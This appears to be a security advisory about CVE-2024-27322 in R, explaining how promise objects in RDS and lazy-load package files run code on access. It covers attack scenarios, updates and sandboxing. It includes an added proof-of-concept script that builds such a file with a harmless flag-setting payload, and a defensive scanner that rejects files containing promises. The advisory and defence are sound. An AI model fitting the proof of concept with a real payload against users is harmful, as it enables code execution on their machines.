A significant security vulnerability has been identified in the R programming language, designated as CVE-2024-27322.
This flaw allows for arbitrary code execution following the deserialization of untrusted data, presenting a substantial risk to data security and application integrity.
The flaw lies in how R deserialises objects: a promise object embedded in the serialisation stream carries an unevaluated expression that R runs when the loaded object is first accessed. This affects RDS (R Data Serialization) files and the .rdx/.rdb lazy-load files that installed R packages are built from.
By creating malicious RDS or .rdx files, an attacker can execute arbitrary commands on a target system, potentially leading to unauthorised access, data exfiltration, or further network penetration.
What Is ‘R’ Used For?
“R is a free software environment for statistical computing and graphics. It compiles and runs on a wide variety of UNIX platforms, Windows and MacOS.” - The R Project
R is a programming language and software environment used for statistical computing and graphics, and is utilised in many of the same ways as Python.
It is widely employed by statisticians, data scientists, and researchers for data analysis, data visualisation, and statistical modelling.
R offers a vast ecosystem of packages for tasks like data manipulation, machine learning, and exploratory analysis.
Its flexibility and extensive libraries make it a popular choice for academic research, business analytics, and data-driven decision-making across various industries.
How Could CVE-2024-27322 Be Exploited?
Malicious RDS Files
Data scientists in large organisations frequently collaborate with external partners.
Through social engineering, they could receive an email from a threat actor posing as a known contact, offering a data set for analysis in the form of an RDS file.
If the data scientist loads the RDS file with readRDS() in their R environment and then references the resulting object, the promise expression it carries is evaluated, triggering the arbitrary code execution.
The malicious code could then perform a range of harmful actions.
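The chain described above, as an added example that is not code from the article or the R project: an environment carrying an unforced promise is written with saveRDS(), read back with readRDS(), and the promise expression runs the first time the loaded object is referenced. The "payload" only flips a flag, so the script is safe to run; function and variable names (make_promise_rds, load_and_touch, payload_ran) are this example's own. On a version before 4.4.0 the report shows the payload running on first access rather than at load time; on 4.4.0 or later, where the page says promises in the stream are restricted, the function reports whichever outcome the interpreter produces instead of assuming one.

```r
## Added example, not from the article or the R project. Reproduces the
## load-then-reference path with a harmless payload.

payload_ran <- FALSE   # flag the payload flips instead of running a command

make_promise_rds <- function(path) {
  holder <- new.env(parent = globalenv())
  # delayedAssign() creates a promise binding: the expression is stored
  # unevaluated and only runs when `trigger` is first accessed.
  delayedAssign("trigger",
                assign("payload_ran", TRUE, envir = globalenv()),
                eval.env = globalenv(), assign.env = holder)
  # The unforced promise (SEXPTYPE PROMSXP) is written into the stream as-is.
  saveRDS(holder, path)
  invisible(path)
}

load_and_touch <- function(path) {
  assign("payload_ran", FALSE, envir = globalenv())
  obj <- tryCatch(readRDS(path), error = function(e) e)
  if (inherits(obj, "error"))
    return(paste("readRDS() rejected the file:", conditionMessage(obj)))
  if (payload_ran)
    return("payload ran during readRDS() itself")
  # Merely referencing the binding forces the promise; no explicit eval() needed.
  obj$trigger
  if (payload_ran) "payload ran on first access, not at load time"
  else "payload never ran (promise neutralised)"
}

path <- tempfile(fileext = ".rds")
make_promise_rds(path)
cat("R", as.character(getRversion()), ":", load_and_touch(path), "\n")
unlink(path)
```

The point to take from the output is the timing: nothing happens while the file sits on disk or even while readRDS() parses it on an affected version; the expression fires on the first ordinary use of the object, which is exactly when an analyst would expect to be looking at data rather than running code.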
To put this into perspective, consider R being used for data analysis at a company such as Uber: if a compromised data set goes undetected, analysis may keep running on it for years.
The financial and reputational damage if this were revealed would be immense, and the knowledge could even be leveraged for extortion.
Compromised R Package from a Third-Party Repository
The above example was regarding an enterprise level project, but its severity is not limited to large projects.
If a junior data analyst was learning R, they may experiment with several third party R packages not found on CRAN or other official sources.
Such a package could ship .rdx and .rdb files that have been manipulated to include malicious promise objects.
When the analyst installs and loads the package, R reads these lazy-load files and inadvertently executes the malicious code. This could lead to their sensitive data being leaked or sold.
However, it could also affect the integrity of any project they work on in the future, including enterprise level projects that allow people to work on their own devices.
Mitigation Strategies
To mitigate this vulnerability, users should take the following steps:
Apply Updates: The R Project has released R 4.4.0 (April 2024), which addresses the vulnerability by restricting the use of promises in the serialisation stream. All users should update to this version or later as soon as possible.
Secure or Sandbox RDS File Usage: To reduce the risk of code execution from untrusted sources, consider using sandboxing or containerization for working with third-party RDS, .rdb, or .rdx files. This approach provides an extra layer of security and minimises potential damage.
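Where an interpreter older than 4.4.0 cannot be retired immediately, a pre-load check is worth having in addition to sandboxing. The following is an added example, not code from the article or the R project: it walks an RDS stream item by item and refuses the file if any promise object (SEXPTYPE 5, PROMSXP) is present, before readRDS() is ever called. Type codes and field order follow R's serialize.c for the XDR format (versions 2 and 3); anything the walker does not understand, bytecode for instance, makes it fail closed. It handles RDS files only, not the per-object .rdb databases of installed packages, and the names scan_rds_for_promises and read_rds_checked are this example's own.

```r
## Added example, not from the article or the R project: reject RDS files
## carrying promise objects before deserialising them.

PROMSXP <- 5L

scan_rds_for_promises <- function(path) {
  con <- gzfile(path, "rb")            # same connection type readRDS() uses
  on.exit(close(con))
  st <- new.env(); st$promises <- 0L; st$items <- 0L
  rint <- function() {
    v <- readBin(con, "integer", n = 1L, size = 4L, endian = "big")
    if (length(v) != 1L) stop("truncated stream")
    v
  }
  rlen <- function() {                 # WriteLENGTH(): -1 then two ints for long vectors
    n <- rint()
    if (n == -1L) { hi <- rint(); lo <- rint(); n <- hi * 2^32 + lo }
    n
  }
  skip <- function(nbytes) if (nbytes > 0) invisible(readBin(con, "raw", n = nbytes))

  if (!identical(readBin(con, "raw", n = 2L), charToRaw("X\n")))
    stop("not an XDR serialisation stream")
  version <- rint(); rint(); rint()    # format version, writer version, min reader version
  if (!version %in% c(2L, 3L)) stop("unsupported serialisation format version ", version)
  if (version == 3L) skip(rint())      # native encoding name

  pairlike <- c(2L, 3L, 5L, 6L, 17L)   # LISTSXP, CLOSXP, PROMSXP, LANGSXP, DOTSXP
  walk <- function(flags = rint()) {
    st$items <- st$items + 1L
    type <- bitwAnd(flags, 0xFFL)
    if (type == 255L) {                # REFSXP: index packed in flags or in next int
      if (bitwShiftR(flags, 8L) == 0L) rint()
      return(invisible())
    }
    has_attr <- bitwAnd(flags, 512L) != 0L
    has_tag  <- bitwAnd(flags, 1024L) != 0L
    if (type == PROMSXP) st$promises <- st$promises + 1L
    if (type %in% c(254L, 253L, 252L, 251L, 250L, 242L, 241L)) return(invisible())  # singletons
    if (type %in% c(249L, 248L, 247L)) {   # namespace/package/persistent: int 0, n, n CHARSXPs
      rint(); for (i in seq_len(rint())) walk(); return(invisible())
    }
    if (type == 238L) { walk(); walk(); walk(); return(invisible()) }  # ALTREP: info, state, attr
    if (type == 1L)   { walk(); return(invisible()) }                  # SYMSXP: name
    if (type == 4L)   { rint(); walk(); walk(); walk(); walk(); return(invisible()) } # ENVSXP
    if (type %in% pairlike) {
      repeat {                         # ATTRIB?, TAG?, CAR, then CDR (iterated, not recursed)
        if (has_attr) walk()
        if (has_tag)  walk()           # for a promise: its evaluation environment
        walk()                         # CAR: for a promise, its cached value (unbound if unforced)
        flags <- rint()                # CDR: for a promise, the expression to be evaluated
        type  <- bitwAnd(flags, 0xFFL)
        if (!type %in% c(2L, 6L, 17L)) { walk(flags); return(invisible()) }
        st$items <- st$items + 1L
        has_attr <- bitwAnd(flags, 512L) != 0L
        has_tag  <- bitwAnd(flags, 1024L) != 0L
      }
    }
    if (type %in% c(7L, 8L)) { skip(rint()); if (has_attr) walk(); return(invisible()) } # primitive name
    if (type == 9L)  { n <- rint(); if (n > 0L) skip(n); if (has_attr) walk(); return(invisible()) } # CHARSXP
    if (type %in% c(10L, 13L)) { skip(4 * rlen()); if (has_attr) walk(); return(invisible()) }
    if (type == 14L) { skip(8 * rlen());  if (has_attr) walk(); return(invisible()) }
    if (type == 15L) { skip(16 * rlen()); if (has_attr) walk(); return(invisible()) }
    if (type == 24L) { skip(rlen());      if (has_attr) walk(); return(invisible()) }
    if (type %in% c(16L, 19L, 20L)) { for (i in seq_len(rlen())) walk(); if (has_attr) walk(); return(invisible()) }
    if (type == 22L) { walk(); walk(); if (has_attr) walk(); return(invisible()) }  # EXTPTRSXP: prot, tag
    if (type %in% c(23L, 25L)) { if (has_attr) walk(); return(invisible()) }        # WEAKREFSXP, S4SXP
    stop("unsupported SEXPTYPE ", type, " in stream (e.g. bytecode); refusing file")
  }
  walk()
  list(promises = st$promises, items = st$items)
}

read_rds_checked <- function(path) {
  report <- scan_rds_for_promises(path)
  if (report$promises > 0L)
    stop(sprintf("%s carries %d promise object(s); refusing to deserialise it", path, report$promises))
  readRDS(path)
}

## Constructed samples: a plain data frame, and an environment holding an
## unforced promise made with delayedAssign() (the object type the exploit abuses).
clean <- tempfile(fileext = ".rds"); bad <- tempfile(fileext = ".rds")
saveRDS(data.frame(id = 1:3, name = c("a", "b", "c")), clean)
holder <- new.env(parent = globalenv())
delayedAssign("trigger", message("this would run on first access"),
              eval.env = globalenv(), assign.env = holder)
saveRDS(holder, bad)
str(read_rds_checked(clean))
tryCatch(read_rds_checked(bad), error = function(e) cat("blocked:", conditionMessage(e), "\n"))
unlink(c(clean, bad))
```

Legitimate data files almost never contain promises (they arise only when an environment with delayed bindings is saved), so blocking on any PROMSXP costs little. The walker is deliberately strict: an unknown item type is a reason to reject the file, not to guess, since an attacker controls every byte of it. This is a stop-gap for the period until every interpreter is on 4.4.0 or later, not a substitute for the update.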
More information about the vulnerability and ways to mitigate it can be found in the CERT Coordination Center vulnerability note published by Carnegie Mellon University's Software Engineering Institute.
Further Reading